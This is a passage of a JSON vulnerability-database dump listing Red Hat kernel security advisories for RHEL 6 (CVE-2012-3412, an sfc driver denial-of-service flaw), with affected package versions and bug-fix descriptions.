"OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-debuginfo-common-s390x", "packageFilename": "kernel-debuginfo-common-s390x-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "s390x", "packageName": "perf", "packageFilename": "perf-2.6.32-279.11.1.el6.s390x.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct this issue, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n", "reporter": "RedHat", "published": "2012-10-16T04:00:00", "type": "redhat", "title": "(RHSA-2012:1366) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:22", "id": "RHSA-2012:1366", "href": "https://access.redhat.com/errata/RHSA-2012:1366", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:17:58", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-kdump-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-kdump", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-debuginfo-common-ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-debug-devel-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-debuginfo-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "perf-debuginfo-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-headers-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-kdump-debuginfo-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-kdump-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-131.35.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "perf-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-debuginfo-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-kdump-devel-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-kdump-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "perf-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-debuginfo-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-debug-debuginfo-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "perf-2.6.32-131.35.1.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-bootwrapper-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-bootwrapper", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-debug-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-debug-debuginfo-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-131.35.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-debug-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "perf-debuginfo-2.6.32-131.35.1.el6.i686.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-131.35.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-debug-devel-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "perf-debuginfo-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-debug-debuginfo-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-headers-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-131.35.1.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-debuginfo-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-debuginfo-common-s390x-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-debuginfo-common-s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "kernel-devel-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-131.35.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "ppc64", "packageFilename": "kernel-devel-2.6.32-131.35.1.el6.ppc64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-131.35.1.el6", "arch": "s390x", "packageFilename": "perf-debuginfo-2.6.32-131.35.1.el6.s390x.rpm", "packageName": "perf-debuginfo", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis update also fixes the following bugs:\n\n* In the hpet_next_event() function, an interrupt could have occurred\nbetween the read and write of the HPET (High Precision Event Timer) and the\nvalue of HPET_COUNTER was then beyond that being written to the comparator\n(HPET_Tn_CMP). Consequently, the timers were overdue for up to several\nminutes. Now, a comparison is performed between the value of the counter\nand the comparator in the HPET code. If the counter is beyond the\ncomparator, the \"-ETIME\" error code is returned, which fixes this bug.\n(BZ#855280)\n\n* Traffic to the NFS server could trigger a kernel oops in the\nsvc_tcp_clear_pages() function. The source code has been modified, and the\nkernel oops no longer occurs in this scenario. (BZ#856104)\n\n* A kernel oops occurred in the nf_nat code when a bogus pointer was\ndereferenced in the nf_conn_nat structure. Consequently, if Source Network\nAddress Translation (SNAT) was performed, incorrect information could be\nreceived by other CTS (Clear to Send) signals. A conntrack entry is now\nplaced in the source hash after SNAT has been completed, which prevents the\ndescribed problems. (BZ#865714)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues. The system must be rebooted for this\nupdate to take effect.\n", "reporter": "RedHat", "published": "2012-11-06T05:00:00", "type": "redhat", "title": "(RHSA-2012:1430) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2016-05-19T22:09:32", "id": "RHSA-2012:1430", "href": "https://access.redhat.com/errata/RHSA-2012:1430", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-05-17T09:23:48", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-devel-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "perf-debuginfo-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-debuginfo-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-bootwrapper-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-bootwrapper", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "src", "packageFilename": "kernel-2.6.32-220.28.1.el6.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-debug-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "python-perf-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-debug-debuginfo-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-headers-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "perf-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-debuginfo-common-s390x-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-debuginfo-common-s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-kdump-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-kdump", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-kdump-debuginfo-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-kdump-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-debug-debuginfo-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "perf-debuginfo-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-debuginfo-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-debug-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "python-perf-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-devel-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "python-perf-debuginfo-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "perf-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-debug-debuginfo-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-debuginfo-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-debug-devel-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-debug-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "perf-2.6.32-220.28.1.el6.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-debuginfo-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "perf-debuginfo-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-debuginfo-common-ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-devel-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-headers-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "noarch", "packageFilename": "kernel-doc-2.6.32-220.28.1.el6.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "perf-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "python-perf-debuginfo-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "python-perf-debuginfo-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "kernel-kdump-devel-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "kernel-kdump-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "s390x", "packageFilename": "python-perf-2.6.32-220.28.1.el6.s390x.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-headers-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.32-220.28.1.el6.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "noarch", "packageFilename": "kernel-firmware-2.6.32-220.28.1.el6.noarch.rpm", "packageName": "kernel-firmware", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "kernel-2.6.32-220.28.1.el6.i686.rpm", "packageName": "kernel", "operator": "lt"}, 